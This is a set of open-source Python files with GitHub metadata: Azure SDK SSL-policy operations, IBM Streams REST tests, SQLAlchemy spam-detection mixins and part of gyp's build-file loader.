    # Construct parameters
    query_parameters = {}
    query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')

    # Construct headers
    header_parameters = {}
    header_parameters['Content-Type'] = 'application/json; charset=utf-8'
    if self.config.generate_client_request_id:
        header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
    if custom_headers:
        # Caller-supplied headers may override the generated ones.
        header_parameters.update(custom_headers)
    if self.config.accept_language is not None:
        header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')

    # Construct and send request
    request = self._client.get(url, query_parameters)
    response = self._client.send(request, header_parameters, stream=False, **operation_config)

    if response.status_code not in [200]:
        exp = CloudError(response)
        exp.request_id = response.headers.get('x-ms-request-id')
        raise exp

    deserialized = None
    if response.status_code == 200:
        deserialized = self._deserialize('ApplicationGatewayAvailableSslOptions', response)

    if raw:
        client_raw_response = ClientRawResponse(deserialized, response)
        return client_raw_response

    return deserialized
list_available_ssl_options.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.Network/applicationGatewayAvailableSslOptions/default'}
def list_available_ssl_predefined_policies(
        self, custom_headers=None, raw=False, **operation_config):
    """Lists all SSL predefined policies for configuring Ssl policy.

    :param dict custom_headers: headers that will be added to the request
    :param bool raw: returns the direct response alongside the
     deserialized response
    :param operation_config: :ref:`Operation configuration
     overrides<msrest:optionsforoperations>`.
    :return: An iterator like instance of
     ApplicationGatewaySslPredefinedPolicy
    :rtype:
     ~azure.mgmt.network.v2017_11_01.models.ApplicationGatewaySslPredefinedPolicyPaged[~azure.mgmt.network.v2017_11_01.models.ApplicationGatewaySslPredefinedPolicy]
    :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
    """
    def internal_paging(next_link=None, raw=False):
        # Page fetcher invoked lazily by the Paged collection: the
        # first call builds the list URL, subsequent calls follow the
        # service-provided next_link verbatim.
        if not next_link:
            # Construct URL
            url = self.list_available_ssl_predefined_policies.metadata['url']
            path_format_arguments = {
                'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
            }
            url = self._client.format_url(url, **path_format_arguments)

            # Construct parameters
            query_parameters = {}
            query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')

        else:
            url = next_link
            query_parameters = {}

        # Construct headers
        header_parameters = {}
        header_parameters['Content-Type'] = 'application/json; charset=utf-8'
        if self.config.generate_client_request_id:
            header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
        if custom_headers:
            header_parameters.update(custom_headers)
        if self.config.accept_language is not None:
            header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')

        # Construct and send request
        request = self._client.get(url, query_parameters)
        response = self._client.send(
            request, header_parameters, stream=False, **operation_config)

        if response.status_code not in [200]:
            exp = CloudError(response)
            exp.request_id = response.headers.get('x-ms-request-id')
            raise exp

        return response

    # Deserialize response: the Paged collection drives internal_paging
    # as the consumer iterates.
    deserialized = models.ApplicationGatewaySslPredefinedPolicyPaged(internal_paging, self._deserialize.dependencies)

    if raw:
        header_dict = {}
        client_raw_response = models.ApplicationGatewaySslPredefinedPolicyPaged(internal_paging, self._deserialize.dependencies, header_dict)
        return client_raw_response

    return deserialized
list_available_ssl_predefined_policies.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.Network/applicationGatewayAvailableSslOptions/default/predefinedPolicies'}
def get_ssl_predefined_policy(
        self, predefined_policy_name, custom_headers=None, raw=False, **operation_config):
    """Gets Ssl predefined policy with the specified policy name.

    :param predefined_policy_name: Name of Ssl predefined policy.
    :type predefined_policy_name: str
    :param dict custom_headers: headers that will be added to the request
    :param bool raw: returns the direct response alongside the
     deserialized response
    :param operation_config: :ref:`Operation configuration
     overrides<msrest:optionsforoperations>`.
    :return: ApplicationGatewaySslPredefinedPolicy or ClientRawResponse if
     raw=true
    :rtype:
     ~azure.mgmt.network.v2017_11_01.models.ApplicationGatewaySslPredefinedPolicy
     or ~msrest.pipeline.ClientRawResponse
    :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
    """
    # Resolve the URL template with the encoded path fragments.
    url = self._client.format_url(
        self.get_ssl_predefined_policy.metadata['url'],
        subscriptionId=self._serialize.url(
            "self.config.subscription_id", self.config.subscription_id, 'str'),
        predefinedPolicyName=self._serialize.url(
            "predefined_policy_name", predefined_policy_name, 'str'))

    query_parameters = {
        'api-version': self._serialize.query(
            "self.api_version", self.api_version, 'str'),
    }

    # Base headers first, then optional request id, then any
    # caller-supplied overrides, then accept-language.
    header_parameters = {'Content-Type': 'application/json; charset=utf-8'}
    if self.config.generate_client_request_id:
        header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
    if custom_headers:
        header_parameters.update(custom_headers)
    if self.config.accept_language is not None:
        header_parameters['accept-language'] = self._serialize.header(
            "self.config.accept_language", self.config.accept_language, 'str')

    request = self._client.get(url, query_parameters)
    response = self._client.send(
        request, header_parameters, stream=False, **operation_config)

    if response.status_code != 200:
        error = CloudError(response)
        error.request_id = response.headers.get('x-ms-request-id')
        raise error

    deserialized = self._deserialize(
        'ApplicationGatewaySslPredefinedPolicy', response)
    if raw:
        return ClientRawResponse(deserialized, response)
    return deserialized
get_ssl_predefined_policy.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.Network/applicationGatewayAvailableSslOptions/default/predefinedPolicies/{predefinedPolicyName}'}
| {
"content_hash": "b013ade93f642f33ba63f7867296f7e3",
"timestamp": "",
"source": "github",
"line_count": 1014,
"max_line_length": 199,
"avg_line_length": 48.234714003944774,
"alnum_prop": 0.6574933551420977,
"repo_name": "lmazuel/azure-sdk-for-python",
"id": "7723e995d21312a9544433999eb1478841f72a5e",
"size": "49384",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "azure-mgmt-network/azure/mgmt/network/v2017_11_01/operations/application_gateways_operations.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "42572767"
}
],
"symlink_target": ""
} |
import logging
import json
import unittest
import time
import uuid
import os
import urllib.parse as urlparse
from operators import DelayedTupleSourceWithLastTuple
from requests import exceptions
from streamsx.topology.tester import Tester
from streamsx.topology import topology, schema
from streamsx.topology.context import ConfigParams, JobConfig
from streamsx.rest import StreamsConnection
from streamsx.rest_primitives import Instance
import streamsx.spl.op as op
import streamsx.spl.toolkit
import streamsx.spl.types
from streamsx.rest_primitives import *
import primitives_caller
logger = logging.getLogger('streamsx.test.rest_test')
def _get_distributed_sc():
    """Return the StreamsConnection for the distributed test environment.

    A 4.3 on-prem install (signalled by STREAMS_DOMAIN_ID in the
    environment) gets a direct StreamsConnection with TLS verification
    disabled; otherwise the connection is taken from an endpoint-based
    Instance.
    """
    if 'STREAMS_DOMAIN_ID' not in os.environ:
        return Instance.of_endpoint(verify=False).rest_client._sc
    connection = StreamsConnection()
    connection.session.verify = False
    return connection
@unittest.skipUnless('STREAMS_INSTANCE_ID' in os.environ, 'Distributed setup required')
class TestDistributedRestFeatures(unittest.TestCase):
    """Exercise the streamsx REST bindings against a live distributed
    Streams instance (requires STREAMS_INSTANCE_ID in the environment).
    """

    def setUp(self):
        # Configure the tester for distributed submission and share one
        # StreamsConnection (TLS verification off) via the test config.
        Tester.setup_distributed(self)
        self.test_config[ConfigParams.SSL_VERIFY] = False
        self.sc = _get_distributed_sc()
        self.sc.session.verify = False
        self.test_config[ConfigParams.STREAMS_CONNECTION] = self.sc

    @classmethod
    def setUpClass(cls):
        """
        Initialize the logger and get the SWS username, password, and REST URL.
        :return: None
        """
        cls.is_v2 = None
        cls.logger = logger

    def test_username_and_password(self):
        self.logger.debug("Beginning test: test_username_and_password.")
        # Ensure, at minimum, that the StreamsContext can connect and retrieve valid data from the SWS resources path
        resources = self.sc.get_resources()
        self.logger.debug("Number of retrieved resources is: " + str(len(resources)))
        self.assertGreater(len(resources), 0, msg="Returned zero resources from the \"resources\" endpoint.")

    def test_streamsconnection_samplecode(self):
        self.logger.debug("Beginning test: test_streamsconnection_samplecode.")
        # Domains may be absent (None) on some deployments, so the
        # assertion is conditional.
        domains = self.sc.get_domains()
        if domains is not None:
            self.assertGreater(len(domains), 0, msg="Should have more than 0 domains.")
        instances = self.sc.get_instances()
        self.assertGreater(len(instances), 0, msg="Should have more than 0 instances.")
        jobs_count = 0
        for instance in instances:
            jobs_count += len(instance.get_jobs())

    def _verify_basic_view(self):
        # local_check callback: fetch a single tuple from the view queue.
        q = self._view.start_data_fetch()
        try:
            view_tuple_value = q.get(block=True, timeout=25.0)
        except:
            # Bare except kept from original: logs the failure
            # (typically a timeout) and re-raises so the test fails.
            logger.exception("Timed out while waiting for tuple.")
            raise
        self._view.stop_data_fetch()
        self.logger.debug("Returned view value in basic_view_support is " + view_tuple_value)
        self.assertTrue(view_tuple_value.startswith('hello'))

    def test_basic_view_support(self):
        self.logger.debug("Beginning test: test_basic_view_support.")
        top = topology.Topology()
        # Send only one tuple
        stream = top.source(DelayedTupleSourceWithLastTuple(['hello'], 20))
        self._view = stream.view(start=True, buffer_time=60)
        # Temporary workaround for Bluemix TLS issue with views
        #stream.publish(schema=schema.CommonSchema.String, topic="__test_topic::test_basic_view_support")
        self.logger.debug("Beginning compilation and submission of basic_view_support topology.")
        tester = Tester(top)
        tester.local_check = self._verify_basic_view
        tester.test(self.test_ctxtype, self.test_config)

    def _verify_job_refresh(self):
        # local_check callback: capture the submitted job and confirm
        # it reports healthy while running.
        result = self.tester.submission_result
        self.job = result.job
        self.assertEqual('healthy', self.job.health)

    def test_job_refresh(self):
        top = topology.Topology()
        src = top.source(['Hello'])
        self.tester = Tester(top)
        self.tester.tuple_count(src, 1)
        self.tester.local_check = self._verify_job_refresh
        self.tester.test(self.test_ctxtype, self.test_config)

        # Job was cancelled by test wait for health to change
        # NOTE(review): with a 0.2s sleep per iteration this allows
        # roughly 2 seconds, not 10 — confirm the intended budget.
        timeout = 10
        while hasattr(self.job, 'health') and 'healthy' == self.job.health:
            time.sleep(0.2)
            timeout -= 1
            try:
                self.job.refresh()
            except exceptions.HTTPError:
                # Job resource disappeared entirely after cancellation.
                self.job = None
                break
            self.assertGreaterEqual(timeout, 0, msg='Timeout exceeded while waiting for job to cancel')

        if hasattr(self.job, 'health'):
            self.assertNotEqual('healthy', self.job.health)

    def _call_rest_apis(self):
        # local_check callback: drive the REST primitives against the
        # submitted job, its instance and (when present) its domain.
        job = self.tester.submission_result.job
        self.assertIsInstance(job, Job)
        primitives_caller.check_job(self, job)

        instance = job.get_instance()
        self.assertIsInstance(instance, Instance)
        primitives_caller.check_instance(self, instance)

        job_alt = instance.get_job(id=job.id)

        domain = instance.get_domain()
        if domain is not None:
            self.assertIsInstance(domain, Domain)
            primitives_caller.check_domain(self, domain)

        # Operator lookup by regex: two operators match .*BASIC.$
        # (BASICC and BASICD), exactly one matches .*BASICD$.
        nops = job.get_operators(name='.*BASIC.$')
        self.assertEqual(2, len(nops))

        nops = job.get_operators(name='.*BASICD$')
        self.assertEqual(1, len(nops))
        self.assertTrue(nops[0].name.endswith('BASICD'))

    def test_basic_calls(self):
        """
        Test the basic rest apis.
        """
        top = topology.Topology()
        src = top.source(['Rest', 'tester'])
        src = src.filter(lambda x : True, name='BASICC')
        src.view()
        src = src.map(lambda x : x, name='BASICD')
        self.tester = Tester(top)
        self.tester.tuple_count(src, 2)
        self.tester.local_check = self._call_rest_apis
        self.tester.test(self.test_ctxtype, self.test_config)

    # Underscore as the local evironment must match the remote environment
    # such as OS version and architecture type.
    def _test_instance_submit(self):
        """ Test submitting a bundle from an Instance.
        Tests all four mechanisms.
        """
        sab_name = 'ISJ_'+uuid.uuid4().hex
        topo = topology.Topology(sab_name, namespace='myinstancens')
        s = op.Source(topo, "spl.utility::Beacon",
            'tuple<uint64 seq>',
            params = {'period': 0.02, 'iterations':100})
        s.seq = s.output('IterationCount()')
        f = op.Map('spl.relational::Filter', s.stream,
            params = {'filter': op.Expression.expression('seq % 2ul == 0ul')})

        bb = streamsx.topology.context.submit('BUNDLE', topo, {})
        self.assertIn('bundlePath', bb)
        self.assertIn('jobConfigPath', bb)

        sc = self.sc
        instances = sc.get_instances()
        if len(instances) == 1:
            instance = instances[0]
        else:
            instance = sc.get_instance(os.environ['STREAMS_INSTANCE_ID'])

        # Mechanism 1: submit the bundle path directly.
        job = instance.submit_job(bb['bundlePath'])
        self.assertIsInstance(job, Job)
        self.assertEqual('myinstancens::'+sab_name, job.applicationName)
        job.cancel()

        # Mechanism 2: submit with a JobConfig built from the generated
        # job-config overlay file.
        with open(bb['jobConfigPath']) as fp:
            jc = JobConfig.from_overlays(json.load(fp))
        jn = 'JN_'+uuid.uuid4().hex
        jc.job_name = jn
        job = instance.submit_job(bb['bundlePath'], jc)
        self.assertIsInstance(job, Job)
        self.assertEqual('myinstancens::'+sab_name, job.applicationName)
        self.assertEqual(jn, job.name)
        job.cancel()

        # Mechanism 3: upload the bundle, then submit the uploaded
        # ApplicationBundle.
        ab = instance.upload_bundle(bb['bundlePath'])
        self.assertIsInstance(ab, ApplicationBundle)
        job = ab.submit_job()
        self.assertIsInstance(job, Job)
        self.assertEqual('myinstancens::'+sab_name, job.applicationName)
        job.cancel()

        # Mechanism 4: submit the uploaded bundle with a job config.
        jn = 'JN_'+uuid.uuid4().hex
        jc.job_name = jn
        job = ab.submit_job(jc)
        self.assertIsInstance(job, Job)
        self.assertEqual('myinstancens::'+sab_name, job.applicationName)
        self.assertEqual(jn, job.name)
        job.cancel()

        os.remove(bb['bundlePath'])
        os.remove(bb['jobConfigPath'])
# Keys expected in every Streaming Analytics instance-status response
# document; checked by TestSasRestFeatures.valid_response.
instance_response_keys = [
    "auto_stop",
    "plan",
    "state",
    "id",
    "status",
    "maximum",
    "crn",
    "size",
    "documentation",
    "streams_self",
    "enabled",
    "job_count",
    "jobs",
    "streams_console",
    "minimum",
    "self"
]
from streamsx.rest_primitives import _IAMConstants
from streamsx.rest import StreamingAnalyticsConnection
class TestSasRestFeatures(TestDistributedRestFeatures):
    """Run the distributed REST tests against the Streaming Analytics
    service, plus service-specific stop/start and sab-submission checks.
    """

    def setUp(self):
        # Remote build is forced because the local environment need not
        # match the service environment.
        Tester.setup_streaming_analytics(self, force_remote_build=True)
        self.sc = StreamingAnalyticsConnection()
        self.test_config[ConfigParams.STREAMS_CONNECTION]=self.sc
        # Detect a V2 service from the credentials in use.
        self.is_v2 = False
        if _IAMConstants.V2_REST_URL in self.sc.session.auth._credentials:
            self.is_v2 = True

    # The underscore in front of this test causes it to be skipped by default
    # This is to prevent the starting and stopping of the instance from
    # interfering with other tests.
    # The test can be run manually:
    # python -m unittest test_rest_bluemix.TestRestFeaturesBluemix._test_service_stop_start
    def _test_service_stop_start(self):
        self.logger.debug("Beginning test: test_service_stop_start")
        sas = self.sc.get_streaming_analytics()

        # running -> stopped -> running round trip, validating the
        # response document at each step.
        status = sas.get_instance_status()
        self.valid_response(status)
        self.assertEqual('running', status['status'])

        res = sas.stop_instance()
        self.valid_response(res)
        status = sas.get_instance_status()
        self.assertEqual('stopped', status['status'])

        res = sas.start_instance()
        self.valid_response(res)
        status = sas.get_instance_status()
        self.assertEqual('running', status['status'])

    def valid_response(self, res):
        # Every expected key must be present in the service response.
        for key in instance_response_keys:
            self.assertTrue(key in res)

    # The underscore in front of this test causes it to be skipped by default
    # This is because the test must run on an os version that matches
    # the service and has a local Streams Install.
    # python3 -m unittest test_rest_bluemix.TestRestFeaturesBluemix._test_submit_sab
    def _test_submit_sab(self):
        sab_name = 'Sab_'+uuid.uuid4().hex
        topo = topology.Topology(sab_name, namespace='mynamespace')
        s = topo.source([1,2])
        es = s.for_each(lambda x : None)

        bb = streamsx.topology.context.submit('BUNDLE', topo, {})
        self.assertIn('bundlePath', bb)
        self.assertIn('jobConfigPath', bb)

        sas = self.sc.get_streaming_analytics()

        # Submit without a job config; the job id key differs between
        # service versions ('id' vs 'jobId').
        sr = sas.submit_job(bundle=bb['bundlePath'])
        job_id = sr.get('id', sr.get('jobId'))
        self.assertIsNotNone(job_id)
        self.assertIn('name', sr)
        self.assertIn('application', sr)
        self.assertEqual('mynamespace::' + sab_name, sr['application'])
        cr = sas.cancel_job(job_id=job_id)

        # Submit again with an explicit job name via JobConfig.
        jn = 'SABTEST:' + uuid.uuid4().hex
        jc = streamsx.topology.context.JobConfig(job_name=jn)
        sr = sas.submit_job(bundle=bb['bundlePath'], job_config=jc)
        job_id = sr.get('id', sr.get('jobId'))
        self.assertIsNotNone(job_id)
        self.assertIn('application', sr)
        self.assertEqual('mynamespace::'+sab_name, sr['application'])
        self.assertIn('name', sr)
        self.assertEqual(jn, sr['name'])
        cr = sas.cancel_job(job_id=job_id)

        os.remove(bb['bundlePath'])
        os.remove(bb['jobConfigPath'])
| {
"content_hash": "e4684882dcd2de4f344de5d11ea124ff",
"timestamp": "",
"source": "github",
"line_count": 325,
"max_line_length": 117,
"avg_line_length": 36.01846153846154,
"alnum_prop": 0.6325815820946523,
"repo_name": "IBMStreams/streamsx.topology",
"id": "c3fa302ad5d542fccafb6d92e357c2c5dfaee52e",
"size": "11706",
"binary": false,
"copies": "1",
"ref": "refs/heads/develop",
"path": "test/python/rest/test_rest.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "15862"
},
{
"name": "C++",
"bytes": "189639"
},
{
"name": "HTML",
"bytes": "11074"
},
{
"name": "Java",
"bytes": "2253833"
},
{
"name": "Makefile",
"bytes": "10174"
},
{
"name": "Perl",
"bytes": "2563"
},
{
"name": "Python",
"bytes": "1949128"
},
{
"name": "Raku",
"bytes": "37043"
},
{
"name": "Scala",
"bytes": "11007"
},
{
"name": "Shell",
"bytes": "16265"
}
],
"symlink_target": ""
} |
from sqlalchemy.ext.declarative import declared_attr
from sqlalchemy import (Column, Integer, Float, String, Boolean,
ForeignKey, DateTime, Sequence, and_)
class UserDirichletMixin(object):
    """ Field of this class contains information necessary for spam detection
    according to dirichlet method.

    Naming convention (presumably, by analogy with ItemDirichletMixin's
    sd_c_n/sd_c_p vote counters — confirm): ``_n`` columns hold negative
    evidence and ``_p`` columns positive evidence; ``base_`` columns are
    the starting values, and ``karma_user_`` columns belong to the
    synthetic "karma user" associated with this user.
    """

    @declared_attr
    def sd_base_u_n(cls):
        return Column(Float, default=0)

    @declared_attr
    def sd_base_u_p(cls):
        return Column(Float, default=0)

    @declared_attr
    def sd_reliab(cls):
        """ Spam detection reliability is computed based on u_n and u_p."""
        return Column(Float, default=0)

    @declared_attr
    def sd_u_n(cls):
        return Column(Float, default=0)

    @declared_attr
    def sd_u_p(cls):
        return Column(Float, default=0)

    @declared_attr
    def sd_karma_user_base_u_n(cls):
        return Column(Float, default=0)

    @declared_attr
    def sd_karma_user_base_u_p(cls):
        return Column(Float, default=0)

    @declared_attr
    def sd_karma_user_reliab(cls):
        """ Spam detection reliability"""
        return Column(Float, default=0)

    @declared_attr
    def sd_karma_user_u_n(cls):
        return Column(Float, default=0)

    @declared_attr
    def sd_karma_user_u_p(cls):
        return Column(Float, default=0)
class ItemDirichletMixin(object):
    """ Item fields which contains information necessary for spam detection
    according to Dirichlet algorithm."""

    @declared_attr
    def sd_c_n(cls):
        """ 'Number' of negative votes for the item"""
        return Column(Float, default=0)

    @declared_attr
    def sd_c_p(cls):
        """ 'Number' of positive votes for the item"""
        return Column(Float, default=0)

    @declared_attr
    def sd_weight(cls):
        """ Spam weight of the item; negative weight indicates spam.

        NOTE(review): the original docstring said this weight is
        computed by Karger's algorithm — apparently copy-pasted from
        ItemKargerMixin.sk_weight; this mixin implements the Dirichlet
        method.  Also note there is no ``default=0`` here, unlike
        sk_weight — confirm whether that is intentional.
        """
        return Column(Float)

    @declared_attr
    def sd_frozen(cls):
        # When True the item no longer takes part in offline spam
        # detection (see sd_get_items_offline_spam_detect).
        return Column(Boolean, default=False)

    @classmethod
    def sd_get_items_offline_spam_detect(cls, session):
        """ Return all items still participating in offline spam
        detection, i.e. those not frozen.
        """
        # ``== False`` (not ``is False``) is intentional: it builds a
        # SQL expression via SQLAlchemy operator overloading.
        items = session.query(cls).filter(
            cls.sd_frozen == False).all()
        return items
class ActionDirichletMixin(object):
    @declared_attr
    def sd_frozen(cls):
        """ If the field is true, then the action does not participate in
        offline spam detection."""
        # Corrected docstring: the query below keeps only sd_frozen == False
        # rows, so frozen actions are excluded (matches ActionKargerMixin).
        return Column(Boolean, default=False)
    @classmethod
    def sd_get_actions_offline_spam_detect(cls, session):
        """ Returns all actions still participating in offline spam
        detection (sd_frozen == False)."""
        # "== False" is intentional SQLAlchemy column-expression syntax.
        actions = session.query(cls).filter(
            cls.sd_frozen == False).all()
        return actions
class UserKargerMixin(object):
    """ Fields of this class contain information necessary for spam detection
    according to the algorithm by Karger."""
    @declared_attr
    def sk_base_reliab(cls):
        """ This field is a base reliability of a user for spam detection
        task.
        """
        return Column(Float, default=0)
    @declared_attr
    def sk_reliab(cls):
        """ Spam detection reliability"""
        return Column(Float, default=0)
    @declared_attr
    def sk_reliab_raw(cls):
        """ Raw reliability is user's reliability before applying asymptotic
        function or normalization. We need it to perform online update.
        """
        return Column(Float, default=0)
    @declared_attr
    def sk_karma_user_base_reliab(cls):
        """ This field is a base reliability for a karma user ("null" user) who
        always votes positively for the user's annotation."""
        return Column(Float, default=0)
    @declared_attr
    def sk_karma_user_reliab(cls):
        # Current reliability of the karma user described above.
        return Column(Float, default=0)
class ItemKargerMixin(object):
    @declared_attr
    def sk_weight(cls):
        """ weight_spam_k is a weight of an item which is computed in Karger's
        algorithm. Negative weight indicates spam.
        """
        return Column(Float, default=0)
    @declared_attr
    def sk_frozen(cls):
        # Frozen items are excluded from offline spam detection (see the
        # query below).
        return Column(Boolean, default=False)
    @classmethod
    def sk_get_items_offline_spam_detect(cls, session):
        """ Returns all items still participating in offline spam detection
        (sk_frozen == False)."""
        # "== False" is intentional SQLAlchemy column-expression syntax.
        items = session.query(cls).filter(
            cls.sk_frozen == False).all()
        return items
class ActionKargerMixin(object):
    @declared_attr
    def sk_frozen(cls):
        """ If the field is true, then the action does not participate in
        offline spam detection."""
        return Column(Boolean, default=False)
    @classmethod
    def sk_get_actions_offline_spam_detect(cls, session):
        """ Returns all actions still participating in offline spam
        detection (sk_frozen == False)."""
        # "== False" is intentional SQLAlchemy column-expression syntax.
        actions = session.query(cls).filter(
            cls.sk_frozen == False).all()
        return actions
| {
"content_hash": "caeac88d05f9542a50731aced3df2c84",
"timestamp": "",
"source": "github",
"line_count": 162,
"max_line_length": 79,
"avg_line_length": 28.944444444444443,
"alnum_prop": 0.6299850714438047,
"repo_name": "mshavlovsky/mannord",
"id": "b5d640dc16a26f13ad722f56edb3ce2634e75ee6",
"size": "4689",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "mannord/spam_detection_mixins.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "Python",
"bytes": "102440"
},
{
"name": "Shell",
"bytes": "146"
}
],
"symlink_target": ""
} |
from compiler.ast import Const
from compiler.ast import Dict
from compiler.ast import Discard
from compiler.ast import List
from compiler.ast import Module
from compiler.ast import Node
from compiler.ast import Stmt
import compiler
import copy
import gyp.common
import optparse
import os.path
import re
import shlex
import subprocess
import sys
# A list of types that are treated as linkable.
linkable_types = ['executable', 'shared_library', 'loadable_module']
# A list of sections that contain links to other targets.
dependency_sections = ['dependencies', 'export_dependent_settings']
# base_path_sections is a list of sections defined by GYP that contain
# pathnames. The generators can provide more keys, the two lists are merged
# into path_sections, but you should call IsPathSection instead of using either
# list directly.
base_path_sections = [
  'destination',
  'files',
  'include_dirs',
  'inputs',
  'libraries',
  'outputs',
  'sources',
]
# Merged list of path-containing section names. Starts empty; populated
# elsewhere (outside this chunk) from base_path_sections plus any
# generator-provided sections, per the comment above.
path_sections = []
def IsPathSection(section):
  """Returns True if |section| is one whose values are treated as paths.

  A section is a path section if it is in the merged path_sections list or
  carries one of the conventional path-ish suffixes.  Trailing merge
  operators ('=', '+', '?', '!') are stripped before the check.
  """
  # If section ends in one of these characters, it's applied to a section
  # without the trailing characters. '/' is notably absent from this list,
  # because there's no way for a regular expression to be treated as a path.
  while section[-1:] in ('=', '+', '?', '!'):
    section = section[0:-1]
  # str.endswith accepts a tuple of suffixes, replacing the original chain
  # of six separate endswith() calls with one test.
  return (section in path_sections or
          section.endswith(('_dir', '_dirs', '_file', '_files',
                            '_path', '_paths')))
# base_non_configuration_keys is a list of key names that belong in the target
# itself and should not be propagated into its configurations. It is merged
# with a list that can come from the generator to
# create non_configuration_keys.
base_non_configuration_keys = [
    # Sections that must exist inside targets and not configurations.
    'actions',
    'configurations',
    'copies',
    'default_configuration',
    'dependencies',
    'dependencies_original',
    'link_languages',
    'libraries',
    'postbuilds',
    'product_dir',
    'product_extension',
    'product_name',
    'product_prefix',
    'rules',
    'run_as',
    'sources',
    'suppress_wildcard',
    'target_name',
    'toolset',
    'toolsets',
    'type',
    'variants',
    # Sections that can be found inside targets or configurations, but that
    # should not be propagated from targets into their configurations.
    'variables',
]
# Merged list (base list above plus generator-provided keys); populated
# elsewhere, outside this chunk.
non_configuration_keys = []
# Keys that do not belong inside a configuration dictionary.
invalid_configuration_keys = [
    'actions',
    'all_dependent_settings',
    'configurations',
    'dependencies',
    'direct_dependent_settings',
    'libraries',
    'link_settings',
    'sources',
    'target_name',
    'type',
]
# Controls how the generator wants the build file paths.
absolute_build_file_paths = False
# Controls whether or not the generator supports multiple toolsets.
multiple_toolsets = False
def GetIncludedBuildFiles(build_file_path, aux_data, included=None):
  """Return a list of all build files included into build_file_path.

  The returned list will contain build_file_path as well as all other files
  that it included, either directly or indirectly. Note that the list may
  contain files that were included into a conditional section that evaluated
  to false and was not merged into build_file_path's dict.

  aux_data is a dict containing a key for each build file or included build
  file. Those keys provide access to dicts whose "included" keys contain
  lists of all other files included by the build file.

  included should be left at its default None value by external callers. It
  is used for recursion.

  The returned list will not contain any duplicate entries. Each build file
  in the list will be relative to the current directory.
  """
  # Identity comparison per PEP 8 (the original used "included == None",
  # which invokes __eq__ and can misbehave for exotic arguments).
  if included is None:
    included = []
  if build_file_path in included:
    return included
  included.append(build_file_path)
  for included_build_file in aux_data[build_file_path].get('included', []):
    GetIncludedBuildFiles(included_build_file, aux_data, included)
  return included
def CheckedEval(file_contents):
  """Return the eval of a gyp file.
  The gyp file is restricted to dictionaries and lists only, and
  repeated keys are not allowed.
  Note that this is slower than eval() is.
  """
  # Parse to an AST and assert the module has the expected shape: a Module
  # wrapping a Stmt wrapping exactly one Discard expression, whose single
  # child is the dict/list literal we hand off to CheckNode for validation.
  parse_tree = compiler.parse(file_contents)
  assert isinstance(parse_tree, Module)
  module_children = parse_tree.getChildren()
  assert module_children[0] is None
  assert isinstance(module_children[1], Stmt)
  stmt_children = module_children[1].getChildren()
  assert isinstance(stmt_children[0], Discard)
  discard_children = stmt_children[0].getChildren()
  assert len(discard_children) == 1
  return CheckNode(discard_children[0], [])
def CheckNode(node, keypath):
  # Recursively converts a compiler.ast node (Dict, List, or Const) into the
  # corresponding plain Python value, raising KeyError on duplicate dict keys
  # and TypeError on any other node type. keypath is the list of key/index
  # strings leading to this node, used only for error messages.
  if isinstance(node, Dict):
    c = node.getChildren()
    # Note: "dict" shadows the builtin; kept as-is to leave code unchanged.
    dict = {}
    # getChildren() on a Dict yields alternating key/value nodes, hence the
    # step of 2.
    for n in range(0, len(c), 2):
      assert isinstance(c[n], Const)
      key = c[n].getChildren()[0]
      if key in dict:
        raise KeyError, "Key '" + key + "' repeated at level " + \
              repr(len(keypath) + 1) + " with key path '" + \
              '.'.join(keypath) + "'"
      kp = list(keypath)  # Make a copy of the list for descending this node.
      kp.append(key)
      dict[key] = CheckNode(c[n + 1], kp)
    return dict
  elif isinstance(node, List):
    c = node.getChildren()
    children = []
    for index, child in enumerate(c):
      kp = list(keypath)  # Copy list.
      kp.append(repr(index))
      children.append(CheckNode(child, kp))
    return children
  elif isinstance(node, Const):
    return node.getChildren()[0]
  else:
    raise TypeError, "Unknown AST node at key path '" + '.'.join(keypath) + \
          "': " + repr(node)
def LoadOneBuildFile(build_file_path, data, aux_data, variables, includes,
                     is_target, check):
  # Reads and evaluates the build file at build_file_path, caching the result
  # in data[build_file_path]. When check is true the contents are validated
  # with CheckedEval; otherwise they are eval()'d with builtins disabled.
  # Includes are then merged in (the explicit |includes| list is honored only
  # when is_target is true). Returns the resulting dict.
  if build_file_path in data:
    return data[build_file_path]
  if os.path.exists(build_file_path):
    build_file_contents = open(build_file_path).read()
  else:
    raise Exception("%s not found (cwd: %s)" % (build_file_path, os.getcwd()))
  build_file_data = None
  try:
    if check:
      build_file_data = CheckedEval(build_file_contents)
    else:
      build_file_data = eval(build_file_contents, {'__builtins__': None},
                             None)
  except SyntaxError, e:
    # Attach the real filename so the traceback points at the build file.
    e.filename = build_file_path
    raise
  except Exception, e:
    gyp.common.ExceptionAppend(e, 'while reading ' + build_file_path)
    raise
  data[build_file_path] = build_file_data
  aux_data[build_file_path] = {}
  # Scan for includes and merge them in.
  try:
    if is_target:
      LoadBuildFileIncludesIntoDict(build_file_data, build_file_path, data,
                                    aux_data, variables, includes, check)
    else:
      LoadBuildFileIncludesIntoDict(build_file_data, build_file_path, data,
                                    aux_data, variables, None, check)
  except Exception, e:
    gyp.common.ExceptionAppend(e,
                               'while reading includes of ' + build_file_path)
    raise
  return build_file_data
def LoadBuildFileIncludesIntoDict(subdict, subdict_path, data, aux_data,
                                  variables, includes, check):
  """Merges included build files into |subdict|.

  Loads every file in the optional |includes| list and every file named by
  |subdict|'s own 'includes' key (resolved relative to |subdict_path|'s
  directory), merging each over |subdict| with MergeDicts.  Every merged
  file is recorded in aux_data[subdict_path]['included'].  Recurses into
